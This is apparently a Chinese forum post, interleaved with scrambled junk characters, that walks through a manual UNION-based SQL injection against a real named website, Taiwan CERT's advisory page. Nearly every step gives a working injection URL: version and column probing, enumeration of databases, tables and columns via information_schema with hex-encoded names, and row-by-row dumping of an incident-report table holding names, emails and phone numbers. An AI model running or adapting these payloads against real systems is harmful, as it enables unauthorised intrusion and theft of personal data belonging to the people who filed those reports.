1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询; Q% V2 A9 O( ?
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解; ^5 |3 R! ]6 F2 Z
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
8 q9 W" P, s; h; A3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--0 M) V: r: v, j
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
, S2 P/ ]- \# h, W4.判断有没有写权限: ]9 D9 g. E$ c \+ b4 s6 G
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限8 V+ ?3 }0 ]3 ]% R- j2 x0 j6 c
没办法,手动猜表啦
) m8 j6 J5 w. a; v5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
# t* O) H) d& _; |但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
+ G% @1 X7 l& S0 Jhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
0 _) w0 D9 [! U成功查出所有数据库,国外的黑客就是不一般。数据库如下:1 V9 l' z! `' L* T2 R6 \
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb/ i0 q$ B9 B# u! a$ F
6.爆表,爆的是twcert库. W9 c! |! w h( J/ ?
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--7 o. b9 q6 j0 t4 d6 D1 ?
爆出如下表1 z4 v- V( v7 E4 l
downloadfile,irsys,newsdata,secrpt,secrpt_big5! [8 O* O9 M/ t& V4 x: v
7.爆列名,这次爆的是irsys表
- ^2 ~ f5 E5 ^, U( s% }+ vhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
) C- f* G4 P5 V8 j8 s; }& s) N爆出如下列8 e: J* w; e! o E
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
' g7 m0 [( _6 K K4 p; v/ B8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
) x, `' l) t ?http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--9 t/ z1 g, m' |, j
返回是3,说明每个列里有3个地段9 Z) r0 D5 z% N& S( t# G9 j
9.爆字段内容
& q. j" C6 D/ z0 E! x# e5 D0 U+ a; Qhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--. C2 N% S3 K [0 w
爆出name列的第一个字段的内容5 s0 o; \! f# O3 v' }; Y
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--5 \- M& q6 o) s9 i2 S$ W
爆出name列的第二个字段的内容 |